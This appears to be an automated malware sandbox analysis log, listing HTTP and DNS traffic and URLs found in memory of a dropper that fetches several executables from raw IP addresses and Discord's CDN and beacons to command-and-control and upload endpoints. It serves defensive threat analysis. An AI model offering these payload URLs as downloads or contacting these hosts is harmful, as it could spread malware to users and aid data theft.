Source: global traffic HTTP traffic detected: GET /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Cache-Control: no-cache | Host: cdn.discordapp.com | Connection: Keep-Alive | Cookie: __cf_bm=wpi6oPUcntYrXWT3PYGwGgDWKmpGfD4ZkuNO6kBvh64-1727564002-1.0.1.1-MrMb8JOnPSN8tnxNgmDckRkxoeMJPdy.Zdp6geseOA1kyYiRgyy32DpdsDfaphc.ai880_T0oqzy1Ij9IOvFEQ; _cfuvid=Fux3.V5pZy3_FTP4N1VuUhIkq8HQnc5B3SRi7LPp5jE-1727564002783-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /1S3fd7 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: iplog.co
Source: global traffic HTTP traffic detected: GET /api/wp-ping.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.91.200.135
Source: global traffic HTTP traffic detected: GET /dl?name=mixnine HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 80.66.75.114 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Channel2.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 103.130.147.211 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Silencer.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 103.130.147.211 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/CheckTool.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 103.130.147.211 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 176.113.115.95 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dergrherg/setup1.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: marafon.in | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d/385121 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 194.58.114.223 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/tac.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 | Host: 103.130.147.211 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /name HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected (11 identical requests): GET /files/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: C | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected (2 identical requests): GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: d | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: s | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c444db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf814c6eb959d3e HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) [this identical request is recorded 62 times in the traffic capture]
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: marafon.in
Source: global traffic DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic DNS traffic detected: DNS query: fivevh5pt.top
Source: global traffic DNS traffic detected: DNS query: iplog.co
Source: global traffic DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic DNS traffic detected: DNS query: ejrsoyz.ua
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 301Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 30 2e 31 34 37 2e 32 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 103.130.147.211 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 22:53:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 301Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 30 2e 31 34 37 2e 32 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 103.130.147.211 Port 80</address></body></html>
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003FA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exeDBK7bm
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Channel2.exel
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exe8
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/CheckTool.exeK
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exe/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/Silencer.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/tac.exeW
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeISelAiW
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.95/thebig/stories.exeS/s9MlP
Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/-
Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/en-GB
Source: playglock32x64.exe, 0000000D.00000002.2683340314.0000000003580000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000008C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908
Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690856967.0000000004382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121%
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121;
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121C:
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/=
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.php
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.php3
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpH
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpR
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpT
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpr
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phprN
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpy
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.phpA
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.phpU
Source: RegAsm.exe, 00000003.00000002.1688734412.0000000001107000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/l
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.phpU
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.phpd
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-ping.php
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBF
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBI
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixnine
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixnineC:
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixninee
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixninelVz0BoyeRjU78
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/key
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/key/
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/name
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/namel
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/soft/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/soft/downloadKR
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000002.2680714464.0000000005C54000.00000004.00001000.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000000.1610946241.0000000000638000.00000002.00000001.01000000.00000010.sdmp, playglock32x64.exe, 0000000D.00000003.1613682541.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acritum.com/ocb/
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1693465597.0000000001552000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fivevh5pt.top/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1691472183.0000000001569000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fivevh5pt.top/v1/upload.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exexe
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ocsp.thawte.com0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://s.symcd.com06
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.innosetup.com/
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://www.openssl.org/f
Source: is-5ANFC.tmp.11.dr String found in binary or memory: http://www.openssl.org/support/faq.html
